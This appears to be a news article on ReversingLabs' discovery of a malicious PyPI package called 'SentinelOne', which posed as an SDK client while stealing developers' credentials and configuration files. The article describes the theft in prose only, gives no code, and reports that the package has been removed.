Researchers discovered criminals spoofing a well-known cybersecurity firm in an attempt to steal data from software developers.
ReversingLabs researchers recently discovered a malicious Python(opens in new tab) package called "SentinelOne" on PyPI.
The package, named after a well-known cybersecurity firm in the United States, masquerades as a legitimate SDK client, enabling easy access to the SentinelOne API from within a separate project.
However, the package also includes "api.py" files that contain malicious code and allow threat actors to steal sensitive data from developers and send it to a third-party IP address (54.254.189.27).
Bash and Zsh histories, SSH keys,.gitconfig files, hosts files, AWS configuration information, Kube configuration information, and other data are being stolen.
According to the publication, these folders typically store auth tokens, secrets, and API keys, granting threat actors additional access to target cloud services and server endpoints.
Worse, the package does provide the functionality that the developers expect. In reality, this is a hijacked package, which means that unsuspecting developers may use it and become victims of their own ignorance. The good news is that ReversingLabs confirmed the package's malicious intent and had it removed from the repository after reporting it to SentinelOne and PyPI.
The malicious actors were very active in the days and weeks leading up to the removal. The package was first submitted to PyPI on December 11, and it has been updated 20 times in less than a month.The researchers discovered that one of the issues fixed with an update was the inability to exfiltrate data from Linux systems.
The researchers concluded that it is difficult to say whether anyone fell for the scam because there is no evidence that the package was used in an actual attack. Nonetheless, all of the published versions were downloaded over 1,000 times.